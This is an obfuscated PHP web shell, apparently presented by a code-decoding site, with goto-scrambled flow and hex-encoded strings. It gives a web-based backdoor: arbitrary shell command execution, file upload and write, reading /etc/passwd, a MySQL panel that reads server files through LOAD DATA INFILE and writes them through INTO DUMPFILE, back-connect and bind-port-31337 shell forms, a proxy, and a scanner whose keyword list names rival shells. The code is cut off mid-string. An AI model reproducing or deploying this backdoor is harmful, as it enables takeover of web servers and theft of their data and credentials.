<br>
Name: <?php goto vBtyR; MXWZj: ?>
<html>
<head>
<style type="text/css">
body {background-color:#000000; font-family:Verdana, Arial, Helvetica, sans-serif; font-size:10px; color:#FFFFFF;}
.link {font-family:Verdana, Arial, Helvetica, sans-serif; font-size:12px; color:#FFFFFF; font-weight:bolder; text-decoration:underline;}
.header {
font-size: 24px;
font-weight: bold;
}
td#info {font-family:Verdana, Arial, Helvetica, sans-serif; font-size:12px; color:#000000; font-weight:bold}
td {
font-size:12px;
}
.Stile1 {
color: #0099FF;
font-weight: bold;
}
input {
background-color: #0066FF;
border:#FFFFFF 2px solid;
color:#FFFFFF;
font-family:Verdana;
font-size:10px;
}
textarea {
background-color: #0066FF;
border:#FFFFFF 2px solid;
color:#FFFFFF;
font-family:Verdana;
font-size:10px;
}
select {
background-color: #0066FF;
border:#FFFFFF 2px solid;
color:#FFFFFF;
font-family:Verdana;
font-size:10px;
}
.Stile2 {color: #FF0000}
.Stile4 {color: #FFFFFF}
</style>
<title><?php goto g2uxT; gL0Qn: ?>
';document.folder.submit();">Home</a> - <a class="link" href="javascript:document.tools.nometool.value='passwd';document.tools.submit();">Cat /etc/passwd</a> - <a class="link" href="javascript:document.tools.nometool.value='encoder';document.tools.submit();">Encoder</a> - <a class="link" href="javascript:document.tools.mode.value='phpinfo';document.tools.submit();">PHPInfo</a> - <a class="link" href="javascript:document.tools.nometool.value='scanner';document.tools.submit();">ShellScan</a> - <a class="link" href="javascript:document.tools.nometool.value='proxy';document.tools.submit();">Proxy</a> </div>
<br>
Directory:</span>
<?php goto kwJny; bsTlP: $totalspace = disk_total_space($dir); goto viyX4; b0O3e: $auf_off_msg = "<font color=red>Allow URL Fopen: OFF</font><br />"; goto I41_y; R93p7: echo $_SERVER["SERVER_SOFTWARE"]; goto CJZdX; s5L8R: if ($_POST["mode"] == "proxysurf") { $output = "<form method="post" action="#">url: <input name="url" type="text" size="50" />
\x9\x9\x9 <input type="submit" value="surf" />
\x9 <input name="curl" type="checkbox" id="curl" value="curl" />\xa \x9 use curl <input name="fopen" type="checkbox" id="fopen" value="fopen" /> use fopen<br /> <input type="hidden" name="mode" value="proxysurf" />\xa\x9\x9\x9 </form><br /><br />"; if (!$_POST[curl] && !$_POST[fopen]) { $dirz = ''; $u = parse_url($_POST[url]); $host = $u["host"]; $file = !empty($u["path"]) ? $u["path"] : "/"; if (substr_count($file, "/") > 1) { $dirz = substr($file, 0, strpos($file, "/")); } $url = @fsockopen($host, 80, $en, $es, 12); if (!$url) { die("<br> Can not connect to host!"); } fputs($url, "GET /{$file} HTTP/1.0\xd
Accept-Encoding: text\xd\xaHost: {$host}\xd\xaReferer: {$host}\xd
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)
\xa
"); while (!feof($url)) { $con = fgets($url); $output .= $con; } fclose($url); } else { if ($_POST[curl]) { ob_clean(); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $_POST[url]); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); ob_end_flush(); } else { if ($_POST[fopen]) { $file = file($_POST[url]); foreach ($file as $line) { $output .= $line; } } } } } goto J2Xxt; lNz2p: if ($_POST["mode"] == "mkdir") { chdir($dir) or die("Error."); if (mkdir($_POST["mkdir"])) { $output = "Directory created."; } } goto ZtUEj; woJ0y: echo phpversion(); goto MzI8V; u7SBB: echo $safemode; goto QKbCa; MzI8V: ?>
<br>
Address: <?php goto wgueM; tB_ou: ini_get("register_globals") == 1 ? $reglobals = $reglobals_on_msg : ($reglobals = $reglobals_off_msg); goto XmImr; VTVhz: ini_set("memory_limit", "1000M"); goto J8nqh; YW3ht: echo $_SERVER["REMOTE_ADDR"]; goto KhM9W; fGQOC: ?>
</td>
</tr>
</table>
</body>
</html>
<?php goto NxT89; lm7Nb: if (substr($dir, -1) != DIRECTORY_SEPARATOR) { $dir .= DIRECTORY_SEPARATOR; } goto ffIPu; eRXYx: $freespace = intval($freespace / 1024 / 1024 / 1024); goto xH0Kk; A5MIx: echo $output; goto fGQOC; aOJ_p: if ($_POST["mode"] == "upload2") { $percorso = $_FILES["myfile"]["tmp_name"]; $nome = $_FILES["myfile"]["name"]; if (!move_uploaded_file($percorso, $dir . $nome)) { $output = "<font color=red>Cannot upload</font>"; } else { $output .= "<br><br>{$nome} Has Been Saved!"; } } goto x6Xi4; xH0Kk: $totalspace = intval($totalspace / 1024 / 1024 / 1024); goto a14x1; CJZdX: ?>
<br>
Free <?php goto hKDLx; fTbem: $auf_on_msg = "<font color=green>Allow URL Fopen: ON</font><br />"; goto b0O3e; OA1M9: echo $percentfree; goto DJSeR; WM1_5: if ($_POST["mode"] == "phpinfo") { phpinfo(); die; } goto WzUtG; hdKVK: ?>
)<br>
Software: <?php goto R93p7; l39TP: ?>
" />
<input name="dbname" type="text" value="<?php goto wPR2p; Pz8cq: echo isset($_COOKIE[mysql_user]) ? $_COOKIE[mysql_user] : "user"; goto UDURP; az06a: if ($_POST["mode"] == "cmd") { chdir($dir); $res = exa(stripslashes($_POST[cmd])); $output = $res; } goto aOJ_p; jTav2: ?>
<?php goto Wglr0; czAlQ: ini_get("magic_quotes_gpc") == 0 ? $gpc = $gpc_off_msg : ($gpc = $gpc_on_msg); goto dTS_Y; mupTn: ?>
<br>
Uname -a: <?php goto J4lso; ihQrV: echo $dir; goto NJm6N; l68qU: if ($_POST["mode"] == "sqlwritefile") { $link = mysql_connect($_COOKIE["mysql_host"], $_COOKIE["mysql_user"], $_COOKIE["mysql_pass"]) or die(mysql_error()); $db = mysql_select_db($_COOKIE["mysql_name"]); $path = $_POST["path"]; $content = $_POST["newtext"]; $txt = bin2hex($content); $query = "SELECT 0x{$txt} INTO DUMPFILE '{$path}';"; $res = mysql_query($query) or die(mysql_error()); $output = $path . " saved!"; } goto MLz8Y; hKDLx: echo $freespace; goto pjlqu; juKuz: ?>Did this file decode correctly?
Original Code
<?php
goto VTVhz; g2uxT: echo "\x5b\x6e\145\x78\x40" . getenv("\x48\124\124\120\x5f\x48\117\x53\x54") . "\x20\176\x5d"; goto lBiCO; Wglr0: echo $uid; goto AMhUj; zKRhl: ini_get("\163\141\x66\x65\x5f\x6d\157\144\145") == 0 ? $safemode = $safemode_off_msg : ($safemode = $safemode_on_msg); goto czAlQ; JoxvX: $safemode_on_msg = "\x3c\x66\157\x6e\164\40\143\157\154\x6f\x72\x3d\x72\145\144\x3e\x53\x61\x66\x65\x20\115\157\144\145\72\40\x4f\116\x3c\x2f\146\157\x6e\164\76\74\x62\x72\x20\x2f\76"; goto vQJqc; dTS_Y: ini_get("\141\154\x6c\x6f\x77\137\165\162\x6c\137\x66\157\160\x65\156") == 1 ? $auf = $auf_on_msg : ($auf = $auf_off_msg); goto tB_ou; HMyaE: if ($_POST["\x6d\x6f\x64\x65"] == "\144\x6f\155\x6b\146\151\x6c\145") { $dir == realpath("\56") ? $file = $_POST["\155\x6b\146\x69\154\145"] : ($file = $dir . $_POST["\x6d\153\146\151\x6c\145"]); $fh = fopen($file, "\x77\x2b") or die("\74\146\157\156\x74\x20\143\x6f\x6c\157\162\75\162\145\144\x3e\x45\x72\162\x6f\162\x3a\40\x63\x61\x6e\x6e\157\164\x20\x63\x72\145\x61\x74\145\x20\x66\x69\154\145\74\x2f\146\x6f\156\x74\x3e"); $_POST["\164\x65\170\164"] = ini_get("\155\141\147\151\143\137\161\x75\157\164\x65\163\137\147\x70\x63") ? stripslashes($_POST["\x74\x65\170\164"]) : $_POST["\x74\145\170\x74"]; fwrite($fh, $_POST["\x74\x65\x78\164"]) or die("\x3c\x66\x6f\156\164\x20\x63\157\x6c\157\162\x3d\162\x65\144\76\x45\162\162\157\x72\72\x20\x63\141\x6e\156\x6f\x74\40\x77\162\x69\164\145\40\x74\x6f\x20\146\151\154\145\x3c\x2f\146\157\156\x74\x3e"); fclose($fh); $output .= "\115\x61\x64\x65\x2e"; } goto PGCay; cJtgm: if ($_POST["\155\x6f\x64\x65"] == "\x73\x71\154\145\170\x70\154\157\x69\x74") { $link = mysql_connect($_COOKIE["\155\171\163\161\x6c\137\x68\x6f\163\x74"], $_COOKIE["\x6d\x79\x73\x71\154\x5f\165\x73\145\x72"], $_COOKIE["\155\x79\163\x71\154\137\160\141\163\163"]) or die(mysql_error()); $db = mysql_select_db($_COOKIE["\x6d\x79\x73\x71\154\x5f\x6e\x61\155\x65"]); $path = $_POST["\160\x61\164\150"]; $query = "\x43\122\x45\101\124\x45\40\x54\x41\102\114\105\x20\140\156\x65\x78\x70\154\x30\151\164\140\x20\x28\x60\160\x61\164\150\140\40\x6c\x6f\156\x67\x74\145\170\164\40\x6e\157\164\40\156\165\x6c\x6c\x29\73"; $delete = "\x44\122\x4f\120\40\x54\101\x42\x4c\x45\40\x60\x6e\145\170\x70\x6c\60\151\x74\140\x3b"; $bypass = "\x4c\117\x41\104\40\104\x41\124\101\40\x4c\117\x43\x41\114\x20\x49\116\x46\111\x4c\105\x20\x27{$path}\47\x20\111\116\124\x4f\40\124\101\x42\114\x45\x20\x6e\x65\x78\x70\x6c\60\x69\x74\x3b"; $fuck = "\x53\105\x4c\105\x43\124\x20\x2a\40\x46\122\x4f\115\40\156\x65\170\160\x6c\60\x69\164\x3b"; mysql_query($delete); mysql_query($query); mysql_query($bypass) or die("\115\x79\163\161\154\x2d\x65\x78\x70\x6c\157\151\164\55\145\162\162\157\x72\x20\72\x20" . mysql_error()); $res = mysql_query($fuck) or die(mysql_error()); $txt = ''; while ($row = mysql_fetch_array($res)) { $txt .= $row[path] . "\12"; } $output = "\x3c\146\x6f\162\x6d\40\141\143\164\x69\157\x6e\x3d\x23\x20\155\145\x74\x68\x6f\x64\x3d\120\x4f\x53\x54\76\x3c\x69\x6e\x70\165\164\x20\164\x79\160\x65\75\x68\x69\x64\x64\x65\156\40\x6e\141\155\x65\75\x6d\157\x64\x65\40\x76\x61\154\x75\145\x3d\x73\161\x6c\x77\162\151\x74\145\x66\x69\154\145\x3e\x46\151\x6c\145\x20\x3a\40\74\142\x3e\x3c\x69\x6e\160\165\x74\x20\x74\171\x70\145\75\x74\x65\x78\164\40\156\141\155\x65\x3d\160\141\x74\150\40\x76\141\154\165\145\x3d\47{$path}\47\x3e\xa\74\151\x6e\160\x75\x74\40\x74\171\160\145\x3d\x73\165\142\155\151\x74\40\166\x61\154\165\145\75\x53\141\x76\145\x3e\40\x3c\x2f\x62\76\74\x62\x72\x20\x2f\x3e\74\x62\x72\x20\57\76\12\x3c\164\145\x78\x74\141\162\145\141\40\x72\x6f\x77\163\75\63\x30\x20\143\157\x6c\163\75\x31\x30\x30\x20\x6e\x61\155\145\x3d\x6e\x65\167\x74\145\170\x74\76" . htmlspecialchars($txt) . "\74\x2f\164\145\x78\164\x61\162\x65\141\76\x3c\x2f\146\157\162\155\76"; } goto l68qU; p9VuD: echo PHP_OS; goto hdKVK; BKIMW: ?>
<?php goto AM3A5; WzUtG: if ($_POST["\x6d\x6f\144\145"] == "\x74\x6f\157\154\x73") { switch ($_POST["\156\157\x6d\145\x74\157\x6f\x6c"]) { case "\160\x61\x73\x73\167\x64": if (!($txt = file_get_contents("\x2f\x65\164\143\57\x70\141\x73\x73\x77\144"))) { $output = "\103\x61\156\x6e\157\164\40\157\160\x65\x6e\40\x2f\x65\164\x63\57\x70\x61\x73\x73\167\x64"; } else { $output = nl2br($txt); } break; case "\x65\x6e\143\x6f\x64\145\162": $output = "\xa\11\11\11\x3c\143\145\x6e\x74\x65\x72\x3e\xa\11\11\11\x3c\x66\x6f\x72\155\40\x61\x63\x74\x69\x6f\x6e\x3d\x23\40\x6d\145\x74\x68\x6f\144\75\x70\157\163\164\76\x3c\x69\x6e\160\x75\x74\x20\164\171\160\145\75\x68\x69\x64\x64\x65\156\x20\x6e\141\x6d\x65\75\155\157\144\x65\40\166\141\x6c\165\x65\x3d\x74\x6f\x6f\x6c\163\x3e\12\11\11\11\x3c\151\x6e\160\x75\x74\40\164\171\x70\145\75\150\x69\x64\x64\145\x6e\40\156\141\155\145\75\156\x6f\155\145\164\x6f\x6f\x6c\x20\166\x61\154\165\145\75\x65\x6e\143\157\144\x65\162\x3e\xa\11\11\11\74\x74\145\x78\x74\141\162\x65\x61\40\x6e\x61\x6d\x65\x3d\x22\160\154\141\x69\x6e\42\40\143\x6f\154\x73\x3d\x35\60\x20\162\157\x77\163\x3d\x35\x3e" . $_POST[plain] . "\74\x2f\164\x65\170\164\141\162\x65\141\76\12\x9\11\x9\x3c\142\x72\76\x3c\142\162\76\xa\x9\11\11\74\151\156\x70\165\x74\x20\x74\x79\x70\145\x3d\163\x75\142\155\151\164\40\166\141\154\165\145\75\42\143\x61\x6c\x63\165\154\x61\164\x65\x22\76\x3c\142\x72\x3e\74\142\162\76\xa\11\x9\x9\x3c\57\x63\x65\156\x74\x65\x72\76\xa\11\11\11\x3c\142\76\x48\141\163\150\145\x73\x3c\57\x62\76\x3a\x3c\x62\162\76\12\x9\11\11\74\143\x65\x6e\x74\145\162\x3e\155\144\65\x20\x2d\12\11\11\11\x20\x3c\x69\156\160\x75\164\x20\x74\171\160\145\75\x74\145\170\x74\x20\163\x69\x7a\145\75\65\x30\x20\x6f\x6e\106\x6f\143\x75\163\x3d\x22\x74\x68\151\163\56\163\x65\154\145\143\164\x28\51\x22\40\157\156\115\157\165\163\145\157\166\x65\162\75\x22\164\x68\x69\163\56\x73\145\x6c\x65\143\164\50\x29\42\x20\x6f\x6e\115\x6f\x75\x73\x65\x6f\165\164\75\x22\x74\150\151\163\56\163\145\154\145\143\x74\50\51\42\40\x76\141\154\165\x65\x3d\42" . md5($_POST[plain]) . "\x22\x20\162\145\x61\x64\x6f\x6e\x6c\x79\76\12\x9\11\11\x20\x3c\142\x72\76\x63\162\171\160\164\40\x2d\40\x3c\x69\156\160\x75\164\x20\164\171\x70\145\75\164\x65\x78\x74\x20\163\x69\x7a\x65\75\x35\x30\40\157\x6e\106\157\x63\x75\163\x3d\x22\x74\150\151\163\x2e\163\145\154\145\143\164\x28\51\x22\x20\157\156\x4d\157\165\x73\x65\157\x76\x65\x72\x3d\42\x74\x68\x69\x73\56\x73\x65\154\145\x63\x74\x28\x29\42\40\157\x6e\x4d\157\165\163\x65\157\x75\164\75\x22\164\x68\151\163\x2e\x73\x65\154\x65\143\x74\50\x29\42\x20\166\141\154\x75\x65\75\x22" . crypt($_POST[plain]) . "\x22\x20\x72\x65\x61\144\x6f\x6e\x6c\171\76\xa\11\x9\x9\40\x3c\142\x72\x3e\163\150\x61\61\x20\x2d\x20\74\x69\156\x70\x75\164\40\164\x79\160\145\75\164\145\170\164\40\163\151\x7a\x65\x3d\x35\x30\x20\x6f\x6e\x46\157\143\x75\x73\x3d\42\x74\x68\x69\163\56\163\x65\x6c\x65\143\x74\50\51\x22\40\x6f\x6e\x4d\157\165\163\x65\157\166\145\x72\75\x22\164\150\151\163\56\163\145\x6c\145\x63\164\x28\x29\42\40\157\x6e\x4d\157\x75\x73\145\x6f\165\x74\75\x22\x74\x68\151\163\56\x73\x65\154\145\143\164\50\51\42\x20\166\141\x6c\x75\x65\x3d\x22" . sha1($_POST[plain]) . "\42\x20\162\145\141\x64\x6f\x6e\154\x79\x3e\x3c\x62\x72\x3e\12\x9\11\x9\40\143\x72\x63\63\62\40\55\40\x3c\x69\x6e\160\165\x74\x20\x74\171\160\x65\x3d\x74\145\x78\x74\x20\x73\x69\x7a\x65\75\65\x30\x20\157\156\106\x6f\x63\165\163\75\42\164\150\x69\x73\x2e\x73\x65\154\x65\x63\x74\50\51\x22\x20\x6f\156\115\x6f\x75\163\x65\157\166\145\x72\x3d\42\x74\x68\151\x73\56\x73\145\x6c\x65\x63\164\50\51\x22\40\157\156\115\x6f\x75\163\x65\157\165\164\x3d\42\x74\150\151\163\x2e\163\145\x6c\145\143\164\50\x29\42\40\x76\141\154\165\x65\75\42" . crc32($_POST[plain]) . "\x22\40\162\x65\x61\x64\157\x6e\x6c\171\x3e\x3c\x62\x72\76\x3c\57\143\x65\x6e\x74\145\162\76\x3c\142\76\x55\162\x6c\x3a\74\57\142\76\x3c\x63\x65\x6e\164\145\x72\76\74\142\x72\x3e\x75\162\x6c\x65\156\143\157\x64\x65\x20\x2d\x20\74\x69\156\x70\x75\x74\40\164\x79\x70\145\x3d\x74\x65\170\x74\x20\x73\x69\172\145\75\63\65\x20\x6f\x6e\106\157\143\165\x73\x3d\42\164\x68\151\x73\56\x73\145\x6c\x65\x63\x74\x28\x29\x22\x20\157\156\x4d\157\x75\x73\x65\x6f\166\145\x72\75\42\164\150\x69\x73\x2e\163\145\154\145\143\164\x28\51\x22\40\x6f\156\115\157\165\x73\145\x6f\x75\x74\x3d\42\164\x68\151\x73\56\x73\145\154\x65\x63\x74\x28\x29\42\x20\x76\141\x6c\x75\x65\75\x22" . urlencode($_POST[plain]) . "\x22\40\x72\x65\141\144\157\x6e\x6c\171\76\12\12\40\x3c\142\x72\76\165\162\x6c\x64\x65\x63\157\144\x65\x20\55\x20\x3c\151\156\x70\165\164\40\164\x79\x70\x65\75\x74\x65\x78\164\x20\163\x69\172\x65\x3d\x33\x35\40\157\156\x46\157\143\165\163\75\x22\x74\x68\x69\163\56\x73\x65\154\x65\143\164\x28\x29\x22\40\x6f\x6e\115\x6f\165\163\x65\x6f\x76\x65\162\x3d\42\164\x68\151\163\x2e\x73\x65\154\145\x63\x74\50\51\42\x20\x6f\x6e\x4d\x6f\165\x73\145\157\x75\x74\75\x22\164\x68\x69\x73\56\x73\145\154\x65\x63\x74\50\x29\x22\40\166\x61\x6c\165\145\x3d\42" . urldecode($_POST[plain]) . "\42\40\162\x65\x61\144\x6f\x6e\154\x79\x3e\xa\x20\x3c\142\x72\x3e\74\57\x63\x65\156\164\145\x72\76\74\x62\76\x42\x61\x73\145\66\x34\72\74\x2f\142\x3e\x3c\x63\145\156\x74\x65\x72\x3e\142\x61\163\x65\x36\x34\x5f\145\x6e\143\x6f\144\145\x20\x2d\40\74\151\156\x70\165\x74\x20\x74\171\x70\x65\75\x74\145\x78\x74\40\163\x69\x7a\145\75\x33\x35\x20\x6f\x6e\x46\157\x63\165\163\x3d\42\164\x68\151\x73\x2e\x73\145\x6c\x65\x63\x74\50\x29\x22\40\157\x6e\x4d\x6f\165\163\x65\157\166\145\162\75\x22\164\x68\151\x73\x2e\163\145\x6c\145\x63\164\x28\51\42\x20\x6f\x6e\115\x6f\x75\x73\x65\x6f\x75\x74\75\x22\164\x68\x69\x73\x2e\x73\145\x6c\x65\143\164\x28\51\x22\x20\x76\x61\154\x75\x65\x3d\x22" . base64_encode($_POST[plain]) . "\x22\40\x72\145\141\x64\157\x6e\x6c\171\76\74\x2f\x63\145\x6e\x74\x65\x72\76\x3c\x63\x65\x6e\x74\145\x72\x3e\142\141\x73\x65\66\x34\137\144\x65\x63\157\144\x65\40\x2d\x20\x3c\151\x6e\160\165\x74\40\x74\x79\160\145\75\164\145\x78\x74\x20\163\151\x7a\x65\x3d\x33\x35\x20\157\156\106\x6f\143\x75\163\x3d\x22\164\x68\151\x73\x2e\x73\x65\x6c\145\x63\164\x28\51\x22\x20\157\156\115\x6f\165\163\145\x6f\x76\145\162\x3d\x22\164\x68\x69\163\x2e\x73\145\154\145\x63\164\x28\x29\x22\40\x6f\156\115\157\x75\x73\145\x6f\165\x74\x3d\x22\164\150\151\163\56\163\x65\x6c\x65\143\164\50\x29\x22\x20\x76\141\154\165\145\x3d\x22" . base64_decode($_POST[plain]) . "\42\40\x72\x65\x61\144\x6f\x6e\x6c\x79\76\x26\x6e\142\163\x70\x3b\74\x2f\x63\145\156\x74\145\162\76\12\x20\74\x62\x72\76\74\x62\76\x42\x61\163\x65\x20\143\157\x6e\x76\145\162\164\141\x74\151\x6f\156\163\74\x2f\142\x3e\72\xa\x20\74\143\x65\x6e\164\145\x72\76\x64\x65\143\62\150\145\170\40\x2d\40\74\x69\156\x70\x75\164\40\x74\x79\160\145\75\x74\145\x78\x74\40\163\x69\x7a\x65\75\63\65\40\157\156\106\157\x63\165\163\x3d\42\164\x68\x69\x73\x2e\163\145\x6c\145\x63\164\50\x29\42\40\157\x6e\x4d\157\165\x73\145\x6f\166\x65\x72\x3d\x22\164\x68\x69\x73\x2e\x73\x65\x6c\x65\143\x74\50\x29\x22\x20\x6f\156\115\x6f\x75\x73\145\x6f\165\x74\75\x22\x74\x68\151\x73\56\163\x65\x6c\145\143\x74\x28\51\x22\x20\166\x61\154\165\145\75\x22" . dechex($_POST[plain]) . "\42\40\x72\145\x61\144\157\156\154\171\x3e\74\x62\162\x3e\12\40\74\57\143\x65\156\x74\x65\x72\x3e\x3c\x2f\x66\157\162\155\76\12\11\11\11"; break; case "\163\143\141\x6e\x6e\x65\162": $scandir = str_replace(realpath("\x2e"), '', $dir); $scannersh = $dir; if ($scannersh == '') { $scannersh = "\57"; } chdir($scannersh); $evil = array("\x64\x63\x33", "\x41\x6e\164\x69\x63\150\x61\x74", "\163\x31\x30\x31", "\156\145\146\141\163\164\x69\x63\141", "\156\x33\164\x53\x68\145\x6c\154", "\x4e\145\x78\x65\x6e", "\x33\x33\162\144", "\143\71\71", "\x63\62\x30\60\67", "\x63\61\60\60", "\x72\x35\67", "\163\150\x65\154\154", "\x6b\60\x74\x77", "\156\x65\x78\x70\x6c\60\162\145\162", "\160\x61\162\x61\x64\157\x78", "\125\160\154\157\x61\x64", "\132\151\x70\123\x68\x65\154\x6c", "\125\163\x75\143\153\164\157\x6f", "\x73\x68\145\154\x6c\137\x65\x78\145\143", "\145\x78\145\x63", "\104\170\x53\150\145\x6c\x6c", "\103\x6f\144\63\162\172", "\106\x69\162\x65\55\x43\x72\141\x73\150", "\x73\x75\142\172\x65\162\157"); $output .= "\74\142\162\x3e\110\157\x20\x61\156\x61\154\151\x7a\172\141\x74\157\40{$scannersh}\74\142\162\x3e"; $checked = array(); foreach (glob("\x2a\x2e\160\150\160\x2a") as $file) { $a = fopen($file, "\162\53"); $b = fread($a, filesize($file)); for ($i = 0; $i < count($evil); $i++) { $me = array_reverse(explode("\57", $_SERVER["\120\110\120\x5f\x53\105\114\106"])); $str = eregi($evil[$i], $b); if ($str !== FALSE and $file != $me[0] and !in_array($file, $checked)) { array_push($checked, $file); $output .= "\x54\162\x6f\x76\141\x74\x6f\40\120\157\x73\163\x69\x62\x69\154\145\x20{$evil[$i]}\x20\x69\156\x20\74\141\40\143\x6c\141\163\163\x3d\x27\x6c\x69\x6e\x6b\47\40\x68\x72\x65\x66\75\47{$scandir}{$file}\47\40\164\x61\x72\147\x65\164\75\47\x5f\142\154\x61\x6e\x6b\x27\76{$file}\x3c\57\141\x3e\74\142\162\x3e"; } } fclose($a); } break; case "\x70\x72\157\x78\171": $output = "\x3c\x66\x6f\162\155\40\155\x65\x74\150\157\144\x3d\42\x70\157\163\x74\x22\x20\141\x63\164\151\x6f\x6e\75\42\x23\x22\x3e\x75\x72\154\x3a\40\x3c\x69\x6e\160\165\x74\x20\x6e\141\x6d\x65\x3d\x22\165\x72\x6c\42\40\164\171\160\145\75\x22\164\x65\170\x74\42\40\x73\x69\172\x65\x3d\x22\x35\x30\x22\40\x2f\x3e\xa\x9\x9\x9\40\x3c\151\156\160\165\x74\x20\164\171\160\x65\x3d\42\x73\165\x62\x6d\x69\164\42\40\166\141\x6c\x75\145\75\x22\163\165\x72\x66\x22\x20\57\x3e\x20\xa\11\x9\11\x20\74\151\156\x70\165\x74\x20\x6e\141\155\x65\75\42\143\165\x72\154\x22\x20\x74\171\x70\x65\x3d\x22\x63\150\145\143\153\142\x6f\170\42\40\151\144\75\x22\x63\165\x72\154\x22\40\x76\141\154\165\145\75\x22\x63\165\162\154\42\x20\x2f\x3e\xa\11\11\x9\x20\x75\163\x65\x20\x63\165\x72\x6c\40\74\151\156\x70\165\x74\40\156\141\155\145\75\42\x66\x6f\160\x65\x6e\42\x20\x74\x79\x70\x65\75\42\x63\x68\145\143\x6b\x62\157\x78\x22\x20\x69\x64\x3d\42\146\x6f\x70\145\156\x22\40\x76\x61\x6c\x75\145\75\42\146\x6f\160\x65\x6e\42\x20\57\x3e\x20\165\163\145\x20\x66\x6f\x70\x65\156\74\142\x72\x20\57\x3e\40\x3c\151\x6e\160\x75\164\40\164\x79\x70\145\x3d\42\x68\151\144\x64\x65\156\42\40\156\x61\x6d\x65\75\x22\x6d\157\x64\x65\42\40\166\141\154\x75\145\75\x22\x70\162\x6f\170\x79\x73\x75\162\146\42\x20\x2f\76\xa\11\11\11\40\74\57\x66\157\x72\x6d\76\x3c\142\162\x20\57\x3e\x3c\x62\162\x20\x2f\76"; break; } } goto s5L8R; Cpo1U: $uid = "\125\151\144\x3a\x20" . getmyuid() . "\40\107\x69\144\x3a\40" . getmygid() . "\x3c\x62\162\40\57\76"; goto NXSQq; KhM9W: ?>
" size="26" />
<input name="port" type="text" value="port..." size="10" />
<input name="submit" type="submit" value="BackConn" />
</div>
</form> </td>
<td style="border:#FFFFFF 1px solid;"><form action=# method="post">
<div align="center"><strong>:: Bind Port :: </strong><br>
<input type="hidden" name="mode" value="bind" />
<input name="submit7" type=submit value="Bind port 31337" />
</div>
</form> </td>
</tr>
<tr>
<td style="border:#FFFFFF 1px solid;"><form action="#" method="post" name="sqlpanel" id="sqlpanel">
<div align="center"><strong>:: MySQL Panel :: </strong><br>
<input type=hidden name=mode value=loginsql />
<input name="user" type="text" value="<?php goto Pz8cq; q3akO: if ($_POST["\x6d\157\x64\x65"] == "\x73\161\x6c\137\161\x75\145\162\x79") { $link = mysql_connect($_COOKIE["\155\171\x73\161\x6c\x5f\150\157\163\x74"], $_COOKIE["\155\x79\x73\161\154\x5f\165\163\145\162"], $_COOKIE["\155\x79\163\x71\x6c\137\x70\x61\163\x73"]) or die(mysql_error()); $db = mysql_select_db($_COOKIE["\x6d\x79\x73\x71\154\x5f\156\x61\155\145"]); isset($_POST["\144\142\156\x61\x6d\145"]) ? mysql_select_db($_POST["\x64\x62\156\x61\x6d\x65"]) : (print ''); $query = mysql_query(urldecode(stripslashes($_POST["\161\x75\145\x72\x79"]))) or die("\105\x72\162\157\162\x20\x71\165\145\162\171\x3a\x20\74\x62\76\173" . stripslashes($_POST[query]) . "\175\x3c\x2f\x62\76\40\x6d\x79\163\x71\154\40\x73\141\x79\x73\x3a" . mysql_error()); $pars = array_keys(mysql_fetch_array($query)); $npars = count($pars); $qwords = explode("\40", $_POST["\161\165\145\162\171"]); global $select, $table_name; if (strtolower($qwords[0]) == "\x73\145\x6c\145\143\x74") { $select = TRUE; $nqw = count($qwords); for ($i = 0; $i < $nqw; $i++) { if (strtolower($qwords[$i]) == "\x66\x72\x6f\155") { $table_name = $qwords[$i + 1]; break; } } } $parz = $pars; $p4rz = $parz; $output .= "\74\146\157\162\155\40\x69\144\75\42\x74\x61\142\154\145\42\40\156\x61\x6d\x65\x3d\42\164\141\142\154\x65\42\40\x6d\145\x74\150\157\x64\x3d\x22\160\157\163\x74\x22\40\141\143\x74\x69\157\156\x3d\42\x23\x22\76\x3c\x69\x6e\x70\165\164\40\x74\171\160\x65\x3d\150\x69\x64\x64\x65\x6e\40\156\x61\155\x65\x3d\155\x6f\x64\145\x20\x76\141\154\165\x65\75\x73\161\x6c\137\x71\165\x65\x72\x79\x20\x2f\x3e\12\40\12\40\x20\x3c\151\156\160\165\x74\x20\156\141\x6d\x65\x3d\x22\x71\165\x65\x72\171\42\40\164\171\160\x65\75\42\x74\x65\170\164\42\x20\x69\144\75\42\x71\x75\145\162\x79\42\40\x73\x69\172\x65\x3d\x22\x35\60\x22\x20\166\141\154\165\145\75\x22\123\x45\114\x45\x43\124\x20\52\40\x46\122\x4f\x4d\40\164\141\x62\154\145\x5f\156\x61\x6d\x65\42\x20\57\x3e\12\40\x20\74\151\156\160\x75\164\40\164\171\x70\145\x3d\42\163\165\x62\x6d\151\x74\42\x20\156\141\155\145\75\x22\123\x75\142\x6d\x69\164\42\x20\166\x61\x6c\165\145\x3d\x22\121\x75\x65\162\x79\x22\x20\57\x3e\12\x3c\x2f\x66\157\x72\155\76\x3c\x66\x6f\x72\x6d\40\141\143\x74\x69\x6f\x6e\75\43\40\155\x65\164\x68\157\144\75\160\x6f\x73\x74\76\x3c\151\156\160\x75\164\x20\x74\x79\160\145\x3d\x68\151\144\x64\x65\156\x20\156\x61\x6d\145\75\x6d\x6f\x64\x65\40\x76\x61\154\x75\x65\75\144\x75\155\x70\x5f\144\x62\76\74\151\156\160\x75\164\x20\x6e\x61\155\x65\x3d\x64\x62\x6e\141\x6d\145\40\x74\x79\x70\145\x3d\164\145\x78\x74\40\x76\x61\x6c\x75\145\75\x22" . $_COOKIE[mysql_name] . 